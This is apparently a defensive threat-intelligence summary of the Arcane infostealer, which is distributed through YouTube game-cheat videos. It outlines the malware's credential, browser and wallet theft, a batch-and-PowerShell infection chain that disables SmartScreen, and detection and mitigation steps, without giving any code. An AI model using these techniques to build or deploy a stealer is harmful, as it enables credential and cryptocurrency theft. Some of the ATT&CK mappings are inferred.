Full Report
YouTube videos promoting game cheats are being used to deliver a previously undocumented stealer malware called Arcane likely targeting Russian-speaking users. "What's intriguing about this malware is how much it collects," Kaspersky said in an analysis. "It grabs account information from VPN and gaming clients, and all kinds of network utilities like ngrok, Playit, Cyberduck, FileZilla, and
Analysis Summary
# Tool/Technique: Arcane Stealer
## Overview
Arcane is a previously undocumented stealer malware primarily distributed through YouTube videos promoting game cheats. It is designed to harvest a wide variety of sensitive data, including credentials, cryptocurrency wallet information, and system configuration files, targeting Russian-speaking users, specifically in Russia, Belarus, and Kazakhstan.
## Technical Details
- Type: Malware family (Infostealer)
- Platform: Windows (Implied by use of DPAPI, PowerShell, and Windows SmartScreen)
- Capabilities: Credential theft, cryptocurrency wallet harvesting, system and network utility configuration exfiltration, process enumeration, screenshot capture.
- First Seen: November 2024 (when attacks were first observed replacing VGS as the primary payload, although VGS was active prior).
## MITRE ATT&CK Mapping
*Note: Since Arcane is newly documented, specific sub-techniques may be inferred based on described behavior.*
- **TA0003 - Persistence** (Likely via initial execution mechanisms)
- **T1547 - Boot or Logon Autostart Execution** (If persistence mechanisms are implemented)
- **TA0005 - Defense Evasion**
- **T1218 - Signed Binary Proxy Execution** (Potential, usage of legitimate tools like PowerShell)
- **TA0009 - Collection**
- **T1005 - Data from Local System** (Harvesting system data, configs)
- **T1555 - Credentials from Password Stores** (Stealing browser data, VPN, crypto wallet credentials)
- **TA0011 - Exfiltration** (Implied)
## Functionality
### Core Capabilities
* **Data Collection:** Harvests login credentials, passwords, cookies from Chromium- and Gecko-based browsers.
* **Application Credential Theft:** Specifically targets account information from numerous applications, including VPN clients (OpenVPN, NordVPN, etc.), network utilities (ngrok, FileZilla), messaging apps (Discord, Telegram), email clients (Outlook), gaming clients (Steam, Epic), and crypto wallets (Exodus, Electrum, Zcash).
* **System Information Gathering:** Enumerates running processes and lists saved Wi-Fi networks and their associated passwords.
* **Screenshot Capture:** Takes screenshots of the infected device.
* **DPAPI Usage:** Employs the Data Protection API (DPAPI) to obtain browser encryption keys needed to decrypt stored sensitive data, typical for stealers.
### Advanced Features
* **Xaitax Utility Integration:** Includes and executes the Xaitax utility covertly to crack browser keys by analyzing its console output, providing an alternative or supplemental method for key extraction.
* **Debug Port Cookie Extraction:** Implements a separate method for extracting cookies from Chromium-based browsers by launching a copy of the browser through a debug port.
* **Payload Chain:** Initial execution involves a password-protected archive unpacked via a `start.bat` batch file, which retrieves a second archive via PowerShell. This batch file disables Windows SmartScreen protections and adds all drive root folders to SmartScreen filter exceptions.
## Indicators of Compromise
- File Hashes: [Not explicitly provided in the article snippet]
- File Names: `start.bat`, Executables embedded in the downloaded archive (one crypto miner, one stealer).
- Registry Keys: [Not explicitly provided in the article snippet]
- Network Indicators: [Not explicitly provided in the article snippet, C2 information is missing]
- Behavioral Indicators:
* Execution of a batch file (`start.bat`) initiating PowerShell commands.
* Disabling Windows SmartScreen protections via configuration changes.
* PowerShell retrieving additional archives over the network.
* Execution of the Xaitax utility.
* Launching browser instances via debug ports.
## Associated Threat Actors
* Unidentified threat actors.
* The campaign appears to be focused on Russian-speaking regions (Russia, Belarus, Kazakhstan).
## Detection Methods
- Signature-based detection: [Not explicitly provided, signature creation would target the known binaries/file hashes once obtained.]
- Behavioral detection: Monitoring for unusual execution chains involving batch files launching PowerShell to retrieve secondary payloads, disabling of SmartScreen, and execution of legitimate tools like Xaitax for decryption.
- YARA rules: [Not explicitly provided]
## Mitigation Strategies
* **User Education:** Caution users against downloading or executing files from suspicious sources, particularly game cheats found via YouTube videos.
* **Endpoint Protection:** Ensure Windows SmartScreen is enabled and maintained (do not allow exceptions for root drive folders).
* **Application Control:** Implement controls to restrict the execution of potentially malicious binaries delivered via unexpected methods.
* **Network Monitoring:** Monitor for unusual PowerShell activity downloading secondary payloads from untrusted sources.
## Related Tools/Techniques
* **VGS Stealer:** The predecessor malware that Arcane replaced in the attack chain; noted as a variant of the Phemedrone Stealer malware.
* **ArcanaLoader:** A related loader tool introduced by the same actors, ostensibly for delivering game cheats but ultimately delivering the stealer malware.
* **Phemedrone Stealer:** The base family from which VGS (and potentially Arcane, given the evolutionary link) derives capabilities.